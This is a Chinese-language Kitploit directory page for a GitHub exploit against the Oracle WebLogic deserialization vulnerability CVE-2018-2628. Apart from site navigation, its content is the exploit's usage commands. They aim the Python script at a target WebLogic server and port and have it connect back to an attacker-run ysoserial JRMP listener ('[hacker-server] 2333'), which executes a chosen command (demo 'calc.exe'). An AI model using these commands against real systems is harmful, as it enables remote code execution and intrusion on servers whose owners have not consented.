Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/cscadoge/weblogic-cve-2018-2628
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubcscadoge/weblogic-cve-2018-2628

weblogic-cve-2018-2628

针对 Oracle WebLogic Server 反序列化漏洞 CVE-2018-2628 的利用程序,通过 ysoserial JRMP listener 实现远程代码执行。

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

weblogic-cve-2018-2628

weblogic-cve-2018-2628-exp

python2 weblogic-cve-2018-2628-exp.py [targetip targetport] ysoserial-0.1-cve-2018-2628-all.jar [bindip bindport] JRMPClient

python weblogic-cve-2018-2628-exp.py [weblogic-server] 7001 ysoserial-0.1-cve-2018-2628-all.jar [hacker-server] 2333 JRMPClient

java -cp [toolname] ysoserial.exploit.JRMPListener [bindport] [jdkversion] [command]

java -cp ysoserial-0.1-cve-2018-2628-all.jar  ysoserial.exploit.JRMPListener 2333 Jdk7u21 "calc.exe"

下载工具